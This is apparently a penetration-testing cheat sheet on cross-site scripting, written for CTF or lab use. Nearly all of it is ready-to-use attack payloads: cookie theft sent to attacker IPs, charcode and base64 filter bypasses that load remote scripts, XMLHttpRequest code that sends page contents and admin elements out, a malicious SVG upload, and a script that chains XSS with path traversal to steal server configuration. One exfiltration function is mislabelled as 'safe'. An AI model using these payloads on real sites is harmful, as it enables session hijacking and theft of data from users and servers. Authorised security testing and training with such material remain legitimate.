Page cover
Edit

XSS

Cross-site Scripting

Detection & Testing

External Resource Testing

Setup HTTP Server:
python3 -m http.server 80
Submit Payload:
<img src='http://IP/test.jpg' />

if you receive a request, external resources are allowed

Basic Code Execution Tests

<script>alert('XSS')</script>
<img src="x"><script>javascript:alert(1)</script>">
fetch('http://10.10.14.91:8000/?cookie=' + document.cookie);
Filter Bypasses

Charcode Bypass

Python Script to Generate Charcode:
python3 -c "print(','.join([str(ord(c)) for c in '''document.write('<script src=\"http://10.10.16.8/tokyo.js\"></script>');''']))"
Now make the payload:
<img src="x/><script>eval(String.fromCharCode(CHARCODE_HERE));</script>">

Base64 Encoding Bypass

<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
Content Extraction

Full HTML Content Capture

var req=new XMLHttpRequest();
req.open('GET', 'http://10.10.16.8:4444/?tokyo=' + btoa(document.body.innerHTML), true);
req.send();

Targeted Element Extraction

Extract specific page elements
function getElement() {
	var req1=new XMLHttpRequest(); 
	req1.open('GET', '#admin' , true); //Swap #admin for your desired element
	req1.onreadystatechange = function () { 
		if (req1.readyState === req1.DONE) {
			if (req1.status === 200) { 
				 var req2=new XMLHttpRequest(); 
				req2.open('GET', 'http://10.10.16.8:4444?tokyo=' + btoa(req1.responseText), true);
				req2.send(); 
				}
			}
		}; 
	req1.send();
}

getElement();

Advanced Content Extraction

Safe content extraction with encoding
function safeContentGrab() {
    var req = new XMLHttpRequest();
    req.open('GET', 'http://example.com', true);
    req.onload = function() {
        if (req.status === 200) {
            var encodedData = btoa(req.responseText);
            console.log('Encoded:', encodedData);
             var sendReq = new XMLHttpRequest();
             sendReq.open('POST', 'http://10.10.16.8:4444/', true);
             sendReq.send('tokyo=' + encodedData);
        }
    };
    req.send();
}

function cookieExample() {
    document.cookie = "testCookie=exampleValue; SameSite=Lax";
    var allCookies = document.cookie;
    console.log('All cookies:', allCookies);
}

safeContentGrab();
cookieExample();
Keylogging

Stored XSS via SVG Upload

Create a malicious SVG file to test image uploading features:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("Hello World");
  </script>
</svg>
XSS + Arbitrary File Upload

  • First, create the file that you are going to use to load the malicious javascript:

Load the file
<script src="http://REMOTE-SERVER:PORT/tokyo.js"></script>

  • Then, create the script:

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.5:3000/?content=' + btoa(req.responseText),
true);
req2.send();
PreviousHTML InjectionNextClickjacking

Last updated